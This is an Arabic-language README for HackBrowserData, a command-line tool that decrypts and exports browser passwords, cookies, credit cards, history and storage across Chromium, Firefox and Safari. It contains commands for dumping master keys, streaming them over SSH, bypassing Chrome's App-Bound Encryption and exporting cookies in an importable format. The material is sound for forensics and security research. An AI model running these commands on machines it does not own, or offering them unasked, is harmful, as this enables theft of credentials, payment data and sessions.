
استخراج وفك تشفير بيانات المتصفح، مع دعم أنواع متعددة من البيانات، وقابل للتشغيل على أنظمة تشغيل مختلفة (macOS، Windows، Linux).
HackBrowserData هي أداة سطر أوامر لفك تشفير وتصدير بيانات المتصفح (كلمات المرور، السجل، ملفات تعريف الارتباط، الإشارات المرجعية، بطاقات الائتمان، سجل التنزيلات، localStorage، sessionStorage والإضافات) من المتصفح. تدعم الأداة أشهر المتصفحات المستندة إلى Chromium وفايرفوكس على ويندوز، ماك، ولينكس، بالإضافة إلى سفاري على ماك.
يمكنها أيضًا فك تشفير البيانات عبر الأجهزة وأنظمة التشغيل: قم بتصدير المفاتيح الرئيسية على الجهاز الأصلي، ثم قم بفك تشفير نسخة من البيانات في وضع عدم الاتصال على أي جهاز آخر — حتى بالنسبة لمتصفح لا يمكن تشغيله على نظام الجهاز المحلل (انظر فك التشفير عبر الأجهزة).
إخلاء مسؤولية: هذه الأداة مخصصة فقط للبحث الأمني. المستخدمون مسؤولون عن جميع الالتزامات القانونية وما يتعلق بها الناتجة عن استخدام هذه الأداة. لا يتحمل المؤلف الأصلي أي مسؤولية قانونية.
على ماك، تتطلب بعض المتصفحات المستندة إلى Chromium كلمة مرور المستخدم الحالي لفك التشفير.
قد يفشل فك تشفير كلمة المرور على ماك الإصدار 26.4 أو الأحدث.
¹ يتطلب سفاري الوصول الكامل للقرص؛ قم بتمكينه في إعدادات النظام → الخصوصية والأمان → الوصول الكامل للقرص إذا أعاد الاستخراج نتائج فارغة.
² على ويندوز، يتطلب فك تشفير ملفات تعريف الارتباط في Chromium 127+ (Chrome / Chrome Beta / Edge / Brave / CocCoc) حمولة App-Bound Encryption المبنية عبر
make build-windows— انظر البناء من المصدر أدناه.³ هذه المتصفحات تأتي فقط على ويندوز، لكن بياناتها قابلة لفك التشفير على أي نظام تشغيل: اسحب الملفات باستخدام
archive، وقم بتصدير المفاتيح باستخدامdumpkeys، ثم قم بفك التشفير على ماك أو لينكس باستخدامrestore— انظر فك التشفير عبر الأجهزة.
تثبيت HackBrowserData بسيط جداً، فقط قم بتنزيل الإصدار المناسب لنظامك وقم بتشغيل الملف الثنائي.
في بعض الحالات، سيتم التعامل مع هذه الأداة الأمنية كفايروس بواسطة Windows Defender أو برامج مكافحة الفايروسات الأخرى ولن يمكن تنفيذها. الكود مفتوح المصدر بالكامل، يمكنك تعديله وترجمته بنفسك.
يتطلب Go 1.20+.```bash
git clone https://github.com/moonD4rk/HackBrowserData
cd HackBrowserData
go build ./cmd/hack-browser-data/
#### بناء متعدد المنصات```bash
# For Windows (standard build, no Chromium 127+ ABE cookie support)
GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/
# For Linux
GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/
يحمي Chrome / Chrome Beta / Edge / Brave / CocCoc 127+ ملفات تعريف الارتباط باستخدام تشفير مرتبط بالتطبيق. يتطلب فك تشفير ملفات تعريف الارتباط هذه حمولة صغيرة بلغة C — يُوصى باستخدام Zig (0.13+) كأداة تطوير C (يستدعي Makefile الأمر zig cc). يمكن أيضًا لـ MinGW-w64 gcc بناء المصادر يدويًا إذا تجاوزت make payload.```bash
brew install zig # macOS scoop install zig # Windows (scoop)
make payload
make build-windows
الملف الناتج `hack-browser-data.exe` يتضمن فك تشفير كاملة لملفات تعريف الارتباط ABE على Chromium 127+.
## الاستخدام```
$ hack-browser-data -h
hack-browser-data decrypts and exports browser data from Chromium-based
browsers and Firefox on Windows, macOS, and Linux.
GitHub: https://github.com/moonD4rk/HackBrowserData
Usage:
hack-browser-data [flags]
hack-browser-data [command]
Available Commands:
archive Pack decryption-relevant profile files into a zip for cross-host restore
dump Extract and decrypt browser data (default command)
dumpkeys Export Chromium master keys as JSON for cross-host decryption
help Help about any command
list List detected browsers and profiles
restore Decrypt copied profile data using exported master keys
version Print version information
Flags:
-b, --browser string target browser: all|chrome|firefox|edge|... (default "all")
-c, --category string data categories (comma-separated): all|password,cookie,... (default "all")
-d, --dir string output directory (default "results")
-f, --format string output format: csv|json|cookie-editor (default "json")
-h, --help help for hack-browser-data
--keychain-pw string macOS keychain password
-p, --profile-path string custom profile dir path, get with chrome://version
-v, --verbose enable debug logging
--zip compress output to zip
Use "hack-browser-data [command] --help" for more information about a command.
dump - استخراج وفك تشفير بيانات المتصفح (افتراضي)تشغيل hack-browser-data بدون أمر فرعي يجعله يستخدم dump افتراضيًا.
يكتب
--format cookie-editorملفات تعريف الارتباط فقط، كمصفوفة JSON تطابق صيغة الاستيراد لإضافة المتصفح Cookie-Editor؛ يتم تخطي الفئات غير المتعلقة بملفات تعريف الارتباط.
فك تشفير بيانات المتصفح على مضيف المحلل التي تم جمعها على مضيف أصلي مختلف — بما في ذلك متصفح لا يمكن لنظام تشغيل المحلل حتى تثبيت محركه (مثل فك تشفير بيانات متصفح Sogou أو QQ على macOS). لا شيء مرتبط بالمنصة (DPAPI، سلسلة مفاتيح macOS، تشفير Chrome المرتبط بالتطبيق) يجب أن يغادر الأصل: يتم تصدير المفاتيح الرئيسية مرة واحدة، ثم يتم فك التشفير بالكامل دون اتصال من نسخة من البيانات.
يستخدم سير العمل ثلاثة أوامر واثنين من القطع الأثرية القابلة للنقل:
hack-browser-data dumpkeys -o keys.json hack-browser-data archive -o browser-data.zip
hack-browser-data restore --keys keys.json --data-zip browser-data.zip
> يحتوي ملف `keys.json` على مفاتيح رئيسية بنص واضح — تعامل معه كسر. الأمر `dumpkeys -o` يكتبه بصلاحيات `0600`؛ يُفضل نقله عبر قناة آمنة بدلاً من تركه على القرص.
#### `dumpkeys` - تصدير المفاتيح الرئيسية لفك التشفير عبر المضيفين
يستخرج المفاتيح الرئيسية لكل تثبيت من Chromium على المضيف الأصلي ويكتبها بصيغة JSON (لا يحتوي Firefox / Safari على مفتاح محمول ويتم تخطيهما). الإعداد الافتراضي هو stdout بحيث يمكن توجيهه عبر SSH.
| Flag | Short | Default | Description |
|-----------------|-------|----------|-------------------------------------------------|
| `--browser` | `-b` | `all` | المتصفح المستهدف (all\|chrome\|edge\|...) |
| `--output` | `-o` | *stdout* | ملف الإخراج (مكتوب بصلاحيات `0600`)؛ stdout إذا تم حذفه |
| `--keychain-pw` | | | كلمة مرور سلسلة مفاتيح macOS |
#### `archive` - حزم الملفات ذات الصلة بفك التشفير للنقل
يجمع فقط الملفات التي يحتاجها الاستعادة فعليًا (ملفات تعريف الارتباط، بيانات تسجيل الدخول، السجل، …) عبر نفس آلية تجاوز الملفات المقفلة المستخدمة في الاستخراج، بحيث يتم قراءة ملفات SQLite الحية بأمان على Windows. يتم ترتيب ملف zip كـ `<browser-key>/<User Data layout>`، لذلك يمكن لأرشيف واحد حمل عدة متصفحات وتظل الاستعادة واضحة. أسماء المدخلات دائمًا بشرطة مائلة للأمام، لذا فإن الأرشيف المنتج على Windows يتم استعادته على macOS / Linux.
| Flag | Short | Default | Description |
|--------------|-------|--------------------|-----------------------------------------|
| `--browser` | `-b` | `all` | المتصفح المستهدف (all\|chrome\|edge\|...) |
| `--category` | `-c` | `all` | فئات البيانات، مفصولة بفواصل |
| `--output` | `-o` | `browser-data.zip` | مسار الأرشيف الناتج |
#### `restore` - فك تشفير البيانات المنسوخة باستخدام المفاتيح المصدرة
يعيد بناء كل محرك Chromium مباشرة من `keys.json` ويفك تشفير البيانات المقدمة — لا يستعين أبدًا بجدول المتصفح المحلي للمحلل، لذلك **المتصفحات التي يمكنك استعادتها هي بالضبط الخزائن الموجودة في `keys.json` الخاص بك**. قدم البيانات بإحدى طريقتين (مطلوب واحدة بالضبط):
- `--data-zip` — ملف zip تم إنشاؤه بواسطة `archive`؛ يتم استخراجه إلى مجلد مؤقت وإزالته بعد ذلك.
- `--data-dir` — دليل. إما تخطيط `archive` (`<browser-key>/...`، عدة متصفحات في وقت واحد)، أو جذر `User Data` المنسوخ يدويًا لمتصفح واحد، وهو غير غامض إلا لمتصفح واحد — لذا قم بإقرانه مع `-b`.
`-b` هو **مرشح اختياري** على خزائن التفريغ، وليس محددًا مطلوبًا.
| Flag | Short | Default | Description |
|--------------|-------|------------|------------------------------------------------------------|
| `--keys` | | *required* | ملف المفاتيح من `dumpkeys` (استخدم `-` للإدخال القياسي) |
| `--data-zip` | | | ملف Zip من `archive` (متنافي مع `--data-dir`) |
| `--data-dir` | | | دليل البيانات المنسوخة (متنافي مع `--data-zip`) |
| `--browser` | `-b` | | استعادة هذا المتصفح فقط؛ يجب أن يتطابق مع خزانة في `--keys` |
| `--category` | `-c` | `all` | فئات البيانات، مفصولة بفواصل |
| `--format` | `-f` | `json` | تنسيق الإخراج (csv\|json\|cookie-editor) |
| `--dir` | `-d` | `results` | دليل الإخراج |
| `--zip` | | `false` | ضغط الإخراج إلى zip |
#### أمثلة عبر المضيفين```bash
# Stream keys over SSH (no keys.json on disk), data copied separately
ssh origin "hack-browser-data dumpkeys" | \
hack-browser-data restore --keys - --data-zip browser-data.zip
# Restore one browser from a hand-copied User Data folder (no archive)
hack-browser-data restore --keys keys.json --data-dir ./chrome-userdata -b chrome
list - قائمة المتصفحات والملفات الشخصية المكتشفة| العلم | الافتراضي | الوصف |
|---|---|---|
--detail | false | عرض عدد الإدخالات لكل فئة |
version - طباعة معلومات الإصدار```bashhack-browser-data version
### العلامات الشاملة
| العلم | الاختصار | الوصف |
|-------------|-------|----------------------|
| `--verbose` | `-v` | تمكين تسجيل التصحيح |
### أمثلة```bash
# Extract all data from all browsers (default)
hack-browser-data
# Extract specific browser and categories
hack-browser-data dump -b chrome -c password,cookie
# Export in CSV format to a custom directory (JSON is the default)
hack-browser-data dump -b chrome -f csv -d output
# Export cookies in CookieEditor format
hack-browser-data dump -f cookie-editor
# Compress output to zip
hack-browser-data dump --zip
# List detected browsers and profiles
hack-browser-data list
# List with per-category entry counts
hack-browser-data list --detail
# Use custom profile path
hack-browser-data dump -b chrome -p "/path/to/User Data/Default"
نرحب ونقدر أي مساهمات من المجتمع (قضايا GitHub / طلبات السحب، ملاحظات البريد الإلكتروني، إلخ).
يرجى الاطلاع على دليل المساهمة قبل المساهمة.
HackBrowserData هو جزء من فريق 404 StarLink-Galaxy، إذا كان لديك أي أسئلة حول HackBrowserData أو تريد العثور على شريك للتواصل، فيرجى الرجوع إلى مجموعة Starlink.

تم تطوير HackBrowserData باستخدام IDE GoLand بموجب تراخيص JetBrains مفتوحة المصدر المجانية الممنوحة من JetBrains s.r.o.، ولذا أود أن أعبر عن شكري هنا.
| الفئة | المستندة إلى Chromium | فايرفوكس | سفاري |
|---|
| كلمة المرور | ✅ | ✅ | ✅ |
| ملف تعريف الارتباط | ✅ | ✅ | ✅ |
| الإشارة المرجعية | ✅ | ✅ | ✅ |
| السجل | ✅ | ✅ | ✅ |
| التنزيل | ✅ | ✅ | ✅ |
| بطاقة الائتمان | ✅ | - | - |
| الإضافة | ✅ | ✅ | ✅ |
| LocalStorage | ✅ | ✅ | ✅ |
| SessionStorage | ✅ | - | - |
| المتصفح | ويندوز | ماك | لينكس |
|---|
| Chrome | ✅² | ✅ | ✅ |
| Chrome Beta | ✅² | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ |
| Edge | ✅² | ✅ | ✅ |
| Brave | ✅² | ✅ | ✅ |
| Opera | ✅ | ✅ | ✅ |
| OperaGX | ✅ | ✅ | - |
| Vivaldi | ✅ | ✅ | ✅ |
| Yandex | ✅ | ✅ | - |
| CocCoc | ✅² | ✅ | - |
| Arc | ✅ | ✅ | - |
| DuckDuckGo³ | ✅ | - | - |
| QQ³ | ✅ | - | - |
| 360 ChromeX³ | ✅ | - | - |
| 360 Chrome³ | ✅ | - | - |
| DC Browser³ | ✅ | - | - |
| Sogou Explorer³ | ✅ | - | - |
| Firefox | ✅ | ✅ | ✅ |
| Safari¹ | - | ✅ | - |
| Flag | Short | Default | Description |
|---|
--browser | -b | all | المتصفح المستهدف (all|chrome|firefox|edge|...) |
--category | -c | all | فئات البيانات، مفصولة بفاصلة (all|password|cookie|bookmark|history|download|creditcard|extension|localstorage|sessionstorage) |
--format | -f | json | صيغة الإخراج (csv|json|cookie-editor) |
--dir | -d | results | دليل الإخراج |
--profile-path | -p | مسار دليل الملف الشخصي المخصص، احصل عليه من chrome://version | |
--keychain-pw | كلمة مرور سلسلة المفاتيح في macOS | ||
--zip | false | ضغط الإخراج إلى zip |
| Step | Host | Command | Produces |
|---|
| 1 | origin | dumpkeys | keys.json — مفاتيح رئيسية محمولة |
| 2 | origin | archive | browser-data.zip — الملفات المطلوبة لفك التشفير فقط |
| 3 | analyst | restore | الإخراج المفكوك (csv / json / cookie-editor) |
Roger |
Aquilao Official |
uinfziuna8n |
Cyrus |
stevenlele |
Carlo Mandelli |
slimwang |
zznQ |
YuXJ |
mirefly |
LC |
zhe6652 |
guoguangwu |
beichen |
Santiago Ramirez |
Ciprian Conache |
a-urth |
Amir. |